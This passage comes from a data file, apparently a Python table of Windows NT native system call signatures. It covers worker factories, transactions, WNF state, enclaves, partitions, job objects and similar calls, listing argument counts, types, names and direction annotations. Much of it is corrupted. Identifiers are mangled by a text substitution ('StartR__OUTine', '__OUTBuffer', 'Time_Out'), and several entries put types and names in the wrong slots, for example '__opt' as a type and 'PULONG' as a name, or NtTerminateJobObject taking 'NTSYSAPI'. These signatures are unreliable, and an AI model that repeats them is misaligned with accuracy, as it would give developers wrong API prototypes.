"ULONG"], ["Ids", "Count"], "NTSTATUS", [None, "__IN"]), "NtQuerySystemInformationEx": (6, ["SYSTEM__INFORMATION_CLASS", "PVOID", "ULONG", "PVOID", "ULONG", "__opt"], ["SystemInformationClass", "QueryInformation", "QueryInformationLength", "SystemInformation", "SystemInformationLength", "PULONG"], "NTSTATUS", ["__IN", None, "__IN", None, "__IN", None]), "NtInitializeNlsFiles": (3, ["PVOID", "PLCID", "PLARGE_INTEGER"], ["*BaseAddress", "DefaultLocaleId", "DefaultCasingTableSize"], "NTSTATUS", ["__OUT", "__OUT", "__OUT"]), "NtAcquireCMFViewOwnership": (3, ["PULONGLONG", "PBOOLEAN", "BOOLEAN"], ["TimeStamp", "tokenTaken", "replaceExisting"], "NTSTATUS", ["__OUT", "__OUT", "__IN"]), "NtCreateProfileEx": (10, ["PHANDLE", "HANDLE", "PVOID", "SIZE_T", "ULONG", "PULONG", "ULONG", "KPROFILE_SOURCE", "ULONG", "PGROUP_AFFINITY"], ["ProfileHandle", "Process", "ProfileBase", "ProfileSize", "BucketSize", "Buffer", "BufferSize", "ProfileSource", "GroupAffinityCount", "GroupAffinity"], "NTSTATUS", ["__OUT", "__IN_opt", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN_opt"]), "NtCreateWorkerFactory": (10, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "HANDLE", "HANDLE", "PVOID", "PVOID", "ULONG", "SIZE_T", "SIZE_T"], ["WorkerFactoryHandleReturn", "DesiredAccess", "ObjectAttributes", "CompletionPortHandle", "WorkerProcessHandle", "StartR__OUTine", "StartParameter", "MaxThreadCount", "StackReserve", "StackCommit"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtFlushInstallUILanguage": (2, ["LANGID", "ULONG"], ["InstallUILanguage", "SetComittedFlag"], "NTSTATUS", ["__IN", "__IN"]), "NtGetMUIRegistryInfo": (3, ["ULONG", "PULONG", "PVOID"], ["Flags", "DataSize", "Data"], "NTSTATUS", ["__IN", "__IN_OUT", "__OUT"]), "NtGetNlsSectionPtr": (5, ["ULONG", "ULONG", "PVOID", "PVOID", "PULONG"], ["SectionType", "SectionData", "ContextData", "*SectionPointer", "SectionSize"], "NTSTATUS", ["__IN", "__IN", "__IN", "__OUT", "__OUT"]), "NtIsUILanguageComitted": (0, [], [], "NTSTATUS", []), "NtReleaseCMFViewOwnership": (0, [], [], "NTSTATUS", []), "NtReleaseWorkerFactoryWorker": (1, ["HANDLE"], ["WorkerFactoryHandle"], "NTSTATUS", ["__IN"]), "NtQueryInformationWorkerFactory": (5, ["HANDLE", "WORKERFACTORYINFOCLASS", "PVOID", "ULONG", "__opt"], ["WorkerFactoryHandle", "WorkerFactoryInformationClass", "WorkerFactoryInformation", "WorkerFactoryInformationLength", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN", None]), "NTSetInformationWorkerFactory": (4, ["HANDLE", "WORKERFACTORYINFOCLASS", "PVOID", "ULONG"], ["WorkerFactoryHandle", "WorkerFactoryInformationClass", "WorkerFactoryInformation", "WorkerFactoryInformationLength"], "NTSTATUS", ["__IN", "__IN", None, "__IN"]), "NtWaitForWorkViaWorkerFactory": (2, ["HANDLE", "FILE_IO_COMPLETION__INFORMATION"], ["WorkerFactoryHandle", "*MiniPacket"], "NTSTATUS", ["__IN", "__OUT"]), "NTShutdownWorkerFactory": (2, ["HANDLE", "LONG"], ["WorkerFactoryHandle", "*PendingWorkerCount"], "NTSTATUS", ["__IN", "__IN_OUT"]), "NTSetTimerEx": (4, ["HANDLE", "TIMER_SET__INFORMATION_CLASS", "PVOID", "ULONG"], ["TimerHandle", "TimerSetInformationClass", "TimerSetInformation", "TimerSetInformationLength"], "NTSTATUS", ["__IN", "__IN", None, "__IN"]), "NtCancelTimer2": (2, ["HANDLE", "__opt"], ["TimerHandle", "PBOOLEAN"], "NTSTATUS", ["__IN", None]), "NTSetTimer2": (4, ["HANDLE", "PLARGE_INTEGER", "PLARGE_INTEGER", "PT2_SET_PARAMETERS"], ["TimerHandle", "DueTime", "Period", "Parameters"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN"]), "NtQueryWnfStateData": (6, ["PCWNF_STATE_NAME", "PCWNF_TYPE_ID", "PVOID", "PWNF_CHANGE_STAMP", "PVOID", "PULONG"], ["StateName", "TypeId", "ExplicitScope", "ChangeStamp", "Buffer", "BufferSize"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_opt_", None, None, "__IN_OUT_"]), "NtUpdateWnfStateData": (7, ["PCWNF_STATE_NAME", "PVOID", "ULONG", "PCWNF_TYPE_ID", "PVOID", "WNF_CHANGE_STAMP", "LOGICAL"], ["StateName", "Buffer", "Length", "TypeId", "ExplicitScope", "MatchingChangeStamp", "CheckStamp"], "NTSTATUS", ["__IN_", None, "__IN_opt_", "__IN_opt_", "__IN_opt_", "__IN_", "__IN_"]), "NtDisableLastKnownGood": (0, [], [], "NTSTATUS", []), "NtEnableLastKnownGood": (0, [], [], "NTSTATUS", []), "NtCancelSynchronousIoFile": (3, ["HANDLE", "PIO_STATUS_BLOCK", "PIO_STATUS_BLOCK"], ["ThreadHandle", "IoRequestToCancel", "IoStatusBlock"], "NTSTATUS", ["__IN", "__IN_opt", "__OUT"]), "NTSetIoCompletion": (5, ["HANDLE", "ULONG", "PVOID", "NTSTATUS", "ULONG_PTR"], ["IoCompletionHandle", "CompletionKey", "CompletionValue", "IoStatus", "IoStatusInformation"], "NTSTATUS", ["__IN", "__IN", "__IN_opt", "__IN", "__IN"]), "NTSetIoCompletionEx": (6, ["HANDLE", "HANDLE", "ULONG", "PVOID", "NTSTATUS", "ULONG_PTR"], ["IoCompletionHandle", "IoCompletionReserveHandle", "CompletionKey", "CompletionValue", "IoStatus", "IoStatusInformation"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN_opt", "__IN", "__IN"]), "NtRemoveIoCompletionEx": (6, ["HANDLE", "FILE_IO_COMPLETION__INFORMATION", "ULONG", "PVOID", "PLARGE_INTEGER", "BOOLEAN"], ["IoCompletionHandle", "IoCompletionInformation", "Count", "NumEntriesRemoved", "Time_Out", "Alertable"], "NTSTATUS", ["__IN", None, "__IN", "__OUT", "__IN_opt", "__IN"]), "NtNotifyChangeSession": (8, ["HANDLE", "ULONG", "PVOID", "ULONG", "IO_SESSION_STATE", "IO_SESSION_STATE", "PVOID", "ULONG"], ["SessionHandle", "IoStateSequence", "Reserved", "Action", "IoState", "IoState2", "Buffer", "BufferSize"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN", "__IN"]), "NtAssociateWaitCompletionPacket": (8, ["HANDLE", "HANDLE", "HANDLE", "PVOID", "PVOID", "NTSTATUS", "ULONG_PTR", "opt_"], ["WaitCompletionPacketHandle", "IoCompletionHandle", "TargetObjectHandle", "KeyContext", "ApcContext", "IoStatus", "IoStatusInformation", "PBOOLEAN"], "NTSTATUS", ["__IN_", "__IN_", "__IN_", "__IN_opt_", "__IN_opt_", "__IN", "__IN_", None]), "NtFlushProcessWriteBuffers": (0, [], [], "NTSTATUS", []), "NtCommitComplete": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtCommitEnlistment": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtCommitTransaction": (2, ["HANDLE", "BOOLEAN"], ["TransactionHandle", "Wait"], "NTSTATUS", ["__IN", "__IN"]), "NtCreateEnlistment": (8, ["PHANDLE", "ACCESS_MASK", "HANDLE", "HANDLE", "POBJECT_ATTRIBUTES", "ULONG", "NOTIFICATION_MASK", "PVOID"], ["EnlistmentHandle", "DesiredAccess", "ResourceManagerHandle", "TransactionHandle", "ObjectAttributes", "CreateOptions", "NotificationMask", "EnlistmentKey"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN", "__IN_opt"]), "NtCreateResourceManager": (7, ["PHANDLE", "ACCESS_MASK", "HANDLE", "LPGUID", "POBJECT_ATTRIBUTES", "ULONG", "PUNICODE_STRING"], ["ResourceManagerHandle", "DesiredAccess", "TmHandle", "RmGuid", "ObjectAttributes", "CreateOptions", "Description"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtCreateTransaction": (10, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "LPGUID", "HANDLE", "ULONG", "ULONG", "ULONG", "PLARGE_INTEGER", "PUNICODE_STRING"], ["TransactionHandle", "DesiredAccess", "ObjectAttributes", "Uow", "TmHandle", "CreateOptions", "IsolationLevel", "IsolationFlags", "Time_Out", "Description"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtCreateTransactionManager": (6, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PUNICODE_STRING", "ULONG", "ULONG"], ["TmHandle", "DesiredAccess", "ObjectAttributes", "LogFileName", "CreateOptions", "CommitStrength"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtEnumerateTransactionObject": (5, ["HANDLE", "KTMOBJECT_TYPE", "PKTMOBJECT_CURSOR", "ULONG", "PULONG"], ["RootObjectHandle", "QueryType", "ObjectCursor", "ObjectCursorLength", "ReturnLength"], "NTSTATUS", ["__IN_opt", "__IN", None, "__IN", "__OUT"]), "NtFreezeTransactions": (2, ["PLARGE_INTEGER", "PLARGE_INTEGER"], ["FreezeTime_Out", "ThawTime_Out"], "NTSTATUS", ["__IN", "__IN"]), "NtGetNotificationResourceManager": (7, ["HANDLE", "PTRANSACTION_NOTIFICATION", "ULONG", "PLARGE_INTEGER", "__opt", "ULONG", "ULONG_PTR"], ["ResourceManagerHandle", "TransactionNotification", "NotificationLength", "Time_Out", "PULONG", "Asynchronous", "AsynchronousContext"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN_opt", None, "__IN", "__IN_opt"]), "NtOpenEnlistment": (5, ["PHANDLE", "ACCESS_MASK", "HANDLE", "LPGUID", "POBJECT_ATTRIBUTES"], ["EnlistmentHandle", "DesiredAccess", "ResourceManagerHandle", "EnlistmentGuid", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_opt"]), "NtOpenResourceManager": (5, ["PHANDLE", "ACCESS_MASK", "HANDLE", "LPGUID", "POBJECT_ATTRIBUTES"], ["ResourceManagerHandle", "DesiredAccess", "TmHandle", "ResourceManagerGuid", "ObjectAttributes"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN_opt", "__IN_opt"]), "NtOpenTransaction": (5, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "LPGUID", "HANDLE"], ["TransactionHandle", "DesiredAccess", "ObjectAttributes", "Uow", "TmHandle"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN_opt"]), "NtOpenTransactionManager": (6, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PUNICODE_STRING", "LPGUID", "ULONG"], ["TmHandle", "DesiredAccess", "ObjectAttributes", "LogFileName", "TmIdentity", "OpenOptions"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__IN_opt"]), "NtPrepareComplete": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtPrepareEnlistment": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtPrePrepareComplete": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtPrePrepareEnlistment": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtPropagationComplete": (4, ["HANDLE", "ULONG", "ULONG", "PVOID"], ["ResourceManagerHandle", "RequestCookie", "BufferLength", "Buffer"], "NTSTATUS", ["__IN", "__IN", "__IN", None]), "NtPropagationFailed": (3, ["HANDLE", "ULONG", "NTSTATUS"], ["ResourceManagerHandle", "RequestCookie", "PropStatus"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtQueryInformationEnlistment": (5, ["HANDLE", "ENLISTMENT__INFORMATION_CLASS", "PVOID", "ULONG", "__opt"], ["EnlistmentHandle", "EnlistmentInformationClass", "EnlistmentInformation", "EnlistmentInformationLength", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN", None]), "NtQueryInformationResourceManager": (5, ["HANDLE", "RESOURCEMANAGER__INFORMATION_CLASS", "PVOID", "ULONG", "__opt"], ["ResourceManagerHandle", "ResourceManagerInformationClass", "ResourceManagerInformation", "ResourceManagerInformationLength", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN", None]), "NtQueryInformationTransaction": (5, ["HANDLE", "TRANSACTION__INFORMATION_CLASS", "PVOID", "ULONG", "__opt"], ["TransactionHandle", "TransactionInformationClass", "TransactionInformation", "TransactionInformationLength", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN", None]), "NtQueryInformationTransactionManager": (5, ["HANDLE", "TRANSACTIONMANAGER__INFORMATION_CLASS", "PVOID", "ULONG", "__opt"], ["TransactionManagerHandle", "TransactionManagerInformationClass", "TransactionManagerInformation", "TransactionManagerInformationLength", "PULONG"], "NTSTATUS", ["__IN", "__IN", None, "__IN", None]), "NtReadOnlyEnlistment": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtRecoverEnlistment": (2, ["HANDLE", "PVOID"], ["EnlistmentHandle", "EnlistmentKey"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtRecoverResourceManager": (1, ["HANDLE"], ["ResourceManagerHandle"], "NTSTATUS", ["__IN"]), "NtRecoverTransactionManager": (1, ["HANDLE"], ["TransactionManagerHandle"], "NTSTATUS", ["__IN"]), "NtRegisterProtocolAddressInformation": (5, ["HANDLE", "PCRM_PROTOCOL_ID", "ULONG", "PVOID", "ULONG"], ["ResourceManager", "ProtocolId", "ProtocolInformationSize", "ProtocolInformation", "CreateOptions"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN", "__IN_opt"]), "NtRenameTransactionManager": (2, ["PUNICODE_STRING", "LPGUID"], ["LogFileName", "ExistingTransactionManagerGuid"], "NTSTATUS", ["__IN", "__IN"]), "NtRollBackComplete": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtRollBackEnlistment": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NtRollBackTransaction": (2, ["HANDLE", "BOOLEAN"], ["TransactionHandle", "Wait"], "NTSTATUS", ["__IN", "__IN"]), "NtRollforwardTransactionManager": (2, ["HANDLE", "PLARGE_INTEGER"], ["TmHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NTSetInformationEnlistment": (4, ["HANDLE", "ENLISTMENT__INFORMATION_CLASS", "PVOID", "ULONG"], ["EnlistmentHandle", "EnlistmentInformationClass", "EnlistmentInformation", "EnlistmentInformationLength"], "NTSTATUS", ["__IN", "__IN", None, "__IN"]), "NTSetInformationResourceManager": (4, ["HANDLE", "RESOURCEMANAGER__INFORMATION_CLASS", "PVOID", "ULONG"], ["ResourceManagerHandle", "ResourceManagerInformationClass", "ResourceManagerInformation", "ResourceManagerInformationLength"], "NTSTATUS", ["__IN", "__IN", None, "__IN"]), "NTSetInformationTransaction": (4, ["HANDLE", "TRANSACTION__INFORMATION_CLASS", "PVOID", "ULONG"], ["TransactionHandle", "TransactionInformationClass", "TransactionInformation", "TransactionInformationLength"], "NTSTATUS", ["__IN", "__IN", None, "__IN"]), "NTSetInformationTransactionManager": (4, ["HANDLE", "TRANSACTIONMANAGER__INFORMATION_CLASS", "PVOID", "ULONG"], ["TmHandle", "TransactionManagerInformationClass", "TransactionManagerInformation", "TransactionManagerInformationLength"], "NTSTATUS", ["__IN_opt", "__IN", None, "__IN"]), "NTSinglePhaseReject": (2, ["HANDLE", "PLARGE_INTEGER"], ["EnlistmentHandle", "TmVirtualClock"], "NTSTATUS", ["__IN", "__IN_opt"]), "NTStartTm": (0, [], [], "NTSTATUS", []), "NtThawRegistry": (0, [], [], "NTSTATUS", []), "NtThawTransactions": (0, [], [], "NTSTATUS", []), "NtDrawText": (1, ["PUNICODE_STRING"], ["Text"], "NTSTATUS", ["__IN"]), "NtTraceControl": (6, ["ULONG", "PVOID", "ULONG", "PVOID", "ULONG", "PULONG"], ["FunctionCode", "InBuffer", "InBufferLen", "__OUTBuffer", "__OUTBufferLen", "ReturnLength"], "NTSTATUS", ["__IN", None, "__IN", None, "__IN", "__OUT"]), "NTSetWnfProcessNotificationEvent": (1, ["HANDLE"], ["Unknown1"], "NTSTATUS", ["__IN"]), "NTSetInformationVirtualMemory": (6, ["HANDLE", "VIRTUAL_MEMORY__INFORMATION_CLASS", "ULONG_PTR", "PMEMORY_RANGE_ENTRY", "PVOID", "ULONG"], ["ProcessHandle", "VmInformationClass", "NumberOfEntries", "VirtualAddresses", "VmInformation", "VmInformationLength"], "NTSTATUS", ["__IN_", "__IN_", "__IN_", None, None, "__IN_"]), "NtOpenPrivateNamespace": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PVOID"], ["NamespaceHandle", "DesiredAccess", "ObjectAttributes", "BoundaryDescriptor"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtCreatePrivateNamespace": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PVOID"], ["NamespaceHandle", "DesiredAccess", "ObjectAttributes", "BoundaryDescriptor"], "NTSTATUS", ["__OUT", "__IN", "__IN_opt", "__IN"]), "NtDeletePrivateNamespace": (1, ["HANDLE"], ["NamespaceHandle"], "NTSTATUS", ["__IN"]), "NtReplacePartitionUnit": (3, ["PUNICODE_STRING", "PUNICODE_STRING", "ULONG"], ["TargetInstancePath", "SpareInstancePath", "Flags"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NTSerializeBoot": (0, [], [], "NTSTATUS", []), "NtOpenKeyTransacted": (4, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "HANDLE"], ["KeyHandle", "DesiredAccess", "ObjectAttributes", "TransactionHandle"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN"]), "NtOpenKeyTransactedEx": (5, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG", "HANDLE"], ["KeyHandle", "DesiredAccess", "ObjectAttributes", "OpenOptions", "TransactionHandle"], "NTSTATUS", ["__OUT", "__IN", "__IN", "__IN", "__IN"]), "NtFreezeRegistry": (1, ["ULONG"], ["Time_OutInSeconds"], "NTSTATUS", ["__IN"]), "NtCreateKeyTransacted": (8, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "__reserved", "PUNICODE_STRING", "ULONG", "HANDLE", "__opt"], ["KeyHandle", "DesiredAccess", "ObjectAttributes", "ULONG", "Class", "CreateOptions", "TransactionHandle", "PULONG"], "NTSTATUS", ["__OUT", "__IN", "__IN", None, "__IN_opt", "__IN", "__IN", None]), "NtQuerySecurityAttributesToken": (6, ["HANDLE", "PUNICODE_STRING", "ULONG", "PVOID", "ULONG", "PULONG"], ["TokenHandle", "Attributes", "NumberOfAttributes", "Buffer", "Length", "ReturnLength"], "NTSTATUS", ["__IN", None, "__IN", None, "__IN", "__OUT"]), "NtWow64CallFunction64": (7, ["ULONG", "ULONG", "ULONG", "PVOID", "ULONG", "PVOID", "__opt"], ["FunctionIndex", "Flags", "InputLength", "InputBuffer", "__OUTputLength", "__OUTputBuffer", "PULONG"], "NTSTATUS", ["__IN", "__IN", "__IN", None, "__IN", None, None]), "NtWow64WriteVirtualMemory64": (5, ["HANDLE", "PVOID64", "PVOID", "ULONGLONG", "__opt"], ["ProcessHandle", "BaseAddress", "Buffer", "BufferSize", "PULONGLONG"], "NTSTATUS", ["__IN", "__IN_opt", None, "__IN", None]), "NtAlpcConnectPortEx": (11, ["PHANDLE", "POBJECT_ATTRIBUTES", "POBJECT_ATTRIBUTES", "PALPC_PORT_ATTRIBUTES", "ULONG", "PSECURITY_DESCRIPTOR", "PPORT_MESSAGE", "PSIZE_T", "PALPC_MESSAGE_ATTRIBUTES", "PALPC_MESSAGE_ATTRIBUTES", "PLARGE_INTEGER"], ["PortHandle", "ConnectionPortObjectAttributes", "ClientPortObjectAttributes", "PortAttributes", "Flags", "ServerSecurityRequirements", "ConnectionMessage", "BufferLength", "__OUTMessageAttributes", "InMessageAttributes", "Time_Out"], "NTSTATUS", [None, "__IN_", "__IN_opt_", "__IN_opt_", "__IN_", "__IN_opt_", None, "__IN_OUT_opt_", "__IN_OUT_opt_", "__IN_OUT_opt_", "__IN_opt_"]), "NtAlpcImpersonateClientContainerOfPort": (3, ["HANDLE", "PPORT_MESSAGE", "ULONG"], ["PortHandle", "Message", "Flags"], "NTSTATUS", ["__IN_", "__IN_", "__IN_"]), "NtAreMappedFilesTheSame": (2, ["PVOID", "PVOID"], ["File1MappedAsAnImage", "File2MappedAsFile"], "NTSTATUS", ["__IN", "__IN"]), "NtAssignProcessToJobObject": (2, ["HANDLE", "HANDLE"], ["JobHandle", "ProcessHandle"], "NTSTATUS", [None, None]), "NtCreateJobSet": (3, ["IN", "IN", "IN"], ["ULONG", "PJOB_SET_ARRAY", "ULONG"], "NTSTATUS", [None, None, None]), "NtCreateJobObject": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["JobHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", [None, None, None]), "NtOpenJobObject": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["JobHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", [None, None, None]), "NtQueryInformationJobObject": (5, ["HANDLE", "JOBOBJECTINFOCLASS", "PVOID", "ULONG", "PULONG"], ["JobHandle", "JobInformationClass", "JobInformation", "JobInformationLength", "ReturnLength"], "NTSTATUS", [None, None, None, None, None]), "NTSetInformationJobObject": (4, ["HANDLE", "JOBOBJECTINFOCLASS", "PVOID", "ULONG"], ["JobHandle", "JobInformationClass", "JobInformation", "JobInformationLength"], "NTSTATUS", [None, None, None, None]), "NtTerminateJobObject": (2, ["HANDLE", "NTSYSAPI"], ["JobHandle", "NTSTATUS"], "NTSTATUS", [None, None]), "NtCallEnclave": (4, ["PENCLAVE_R__OUTINE", "PVOID", "BOOLEAN", "opt_"], ["R__OUTine", "Parameter", "WaitForThread", "PVOID"], "NTSTATUS", ["__IN_", "__IN_", "__IN_", None]), "NtTerminateEnclave": (2, ["PVOID", "BOOLEAN"], ["BaseAddress", "WaitForThread"], "NTSTATUS", ["__IN_", "__IN_"]), "NtInitializeEnclave": (5, ["HANDLE", "PVOID", "PVOID", "ULONG", "opt_"], ["ProcessHandle", "BaseAddress", "EnclaveInformation", "EnclaveInformationLength", "PULONG"], "NTSTATUS", ["__IN_", "__IN_", None, "__IN_", None]), "NtCreateEnclave": (9, ["HANDLE", "PVOID*", "ULONG_PTR", "SIZE_T", "SIZE_T", "ULONG", "PVOID", "ULONG", "opt_"], ["ProcessHandle", "BaseAddress", "ZeroBits", "Size", "InitialCommitment", "EnclaveType", "EnclaveInformation", "EnclaveInformationLength", "PULONG"], "NTSTATUS", ["__IN_", "__IN_OUT_", "__IN_", "__IN_", "__IN_", "__IN_", None, "__IN_", None]), "NtLoadEnclaveData": (9, ["HANDLE", "PVOID", "PVOID", "SIZE_T", "ULONG", "PVOID", "ULONG", "opt_", "opt_"], ["ProcessHandle", "BaseAddress", "Buffer", "BufferSize", "Protect", "PageInformation", "PageInformationLength", "PSIZE_T", "PULONG"], "NTSTATUS", ["__IN_", "__IN_", None, "__IN_", "__IN_", None, "__IN_", None, None]), "NtCreateSectionEx": (9, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "PLARGE_INTEGER", "ULONG", "ULONG", "HANDLE", "PMEM_EXTENDED_PARAMETER", "ULONG"], ["SectionHandle", "DesiredAccess", "ObjectAttributes", "MaximumSize", "SectionPageProtection", "AllocationAttributes", "FileHandle", "ExtendedParameters", "ExtendedParameterCount"], "NTSTATUS", [None, "__IN_", "__IN_opt_", "__IN_opt_", "__IN_", "__IN_", "__IN_opt_", None, "__IN_"]), "NtMapViewOfSectionEx": (9, ["HANDLE", "HANDLE", "PVOID", "PLARGE_INTEGER", "PSIZE_T", "ULONG", "ULONG", "PMEM_EXTENDED_PARAMETER", "ULONG"], ["SectionHandle", "ProcessHandle", "*BaseAddress", "SectionOffset", "ViewSize", "AllocationType", "Win32Protect", "ExtendedParameters", "ExtendedParameterCount"], "NTSTATUS", ["__IN_", "__IN_", None, "__IN_OUT_opt_", "__IN_OUT_", "__IN_", "__IN_", None, "__IN_"]), "NtUnmapViewOfSectionEx": (3, ["HANDLE", "PVOID", "ULONG"], ["ProcessHandle", "BaseAddress", "Flags"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_"]), "NtCreatePartition": (5, ["HANDLE", "PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG"], ["ParentPartitionHandle", "PartitionHandle", "DesiredAccess", "ObjectAttributes", "PreferredNode"], "NTSTATUS", ["__IN_", None, "__IN_", "__IN_opt_", "__IN_"]), "NtOpenPartition": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["PartitionHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", [None, "__IN_", "__IN_"]), "NtManagePartition": (5, ["HANDLE", "HANDLE", "PARTITION__INFORMATION_CLASS", "PVOID", "ULONG"], ["TargetHandle", "SourceHandle", "PartitionInformationClass", "PartitionInformation", "PartitionInformationLength"], "NTSTATUS", ["__IN_", "__IN_opt_", "__IN_", None, "__IN_"]), "NtMapUserPhysicalPages": (3, ["PVOID", "ULONG_PTR", "PULONG_PTR"], ["VirtualAddress", "NumberOfPages", "UserPfnArray"], "NTSTATUS", ["__IN_", "__IN_", None]), "NtAllocateUserPhysicalPagesEx": (5, ["HANDLE", "PULONG_PTR", "PULONG_PTR", "PMEM_EXTENDED_PARAMETER", "ULONG"], ["ProcessHandle", "NumberOfPages", "UserPfnArray", "ExtendedParameters", "ExtendedParameterCount"], "NTSTATUS", ["__IN_", "__IN_OUT_", None, None, "__IN_"]), "NtGetWriteWatch": (7, ["HANDLE", "ULONG", "PVOID", "SIZE_T", "PVOID", "PULONG_PTR", "PULONG"], ["ProcessHandle", "Flags", "BaseAddress", "RegionSize", "*UserAddressArray", "EntriesInUserAddressArray", "Granularity"], "NTSTATUS", ["__IN_", "__IN_", "__IN_", "__IN_", None, "__IN_OUT_", None]), "NtResetWriteWatch": (3, ["HANDLE", "PVOID", "SIZE_T"], ["ProcessHandle", "BaseAddress", "RegionSize"], "NTSTATUS", ["__IN_", "__IN_", "__IN_"]), "NtCreatePagingFile": (4, ["PUNICODE_STRING", "PLARGE_INTEGER", "PLARGE_INTEGER", "ULONG"], ["PageFileName", "MinimumSize", "MaximumSize", "Priority"], "NTSTATUS", ["__IN_", "__IN_", "__IN_", "__IN_"]), "NtCancelIoFileEx": (3, ["HANDLE", "PIO_STATUS_BLOCK", "PIO_STATUS_BLOCK"], ["FileHandle", "IoRequestToCancel", "IoStatusBlock"], "NTSTATUS", ["__IN_", "__IN_opt_", None]), "NtCancelWaitCompletionPacket": (2, ["HANDLE", "BOOLEAN"], ["WaitCompletionPacketHandle", "RemoveSignaledPacket"], "NTSTATUS", ["__IN_", "__IN_"]), "NtCreateWaitCompletionPacket": (3, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES"], ["WaitCompletionPacketHandle", "DesiredAccess", "ObjectAttributes"], "NTSTATUS", [None, "__IN_", "__IN_opt_"]), "NtCompareObjects": (2, ["HANDLE", "HANDLE"], ["Handle", "Handle2"], "NTSTATUS", ["__IN_", "__IN_"]), "NtCompareTokens": (3, ["HANDLE", "HANDLE", "PBOOLEAN"], ["FirstTokenHandle", "SecondTokenHandle", "Equal"], "NTSTATUS", ["__IN_", "__IN_", None]), "NtContinueEx": (2, ["PCONTEXT", "PKCONTINUE_ARGUMENT"], ["ContextRecord", "ContinueArgument"], "NTSTATUS", ["__IN_", "__IN_"]), "NtCreateCrossVmEvent": (6, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG", "PVOID", "PGUID"], ["EventHandle", "DesiredAccess", "ObjectAttributes", "Unknown", "Unknown", "Guid"], "NTSTATUS", ["__OUT", "__IN", "__IN", None, None, "__IN"]), "NtCreateCrossVmMutant": (6, ["PHANDLE", "ACCESS_MASK", "POBJECT_ATTRIBUTES", "ULONG", "PVOID", "PGUID"], ["EventHandle", "DesiredAccess", "ObjectAttributes", "Unknown", "Unknown", "Guid"], "NTSTATUS", ["__OUT", "__IN", "__IN", 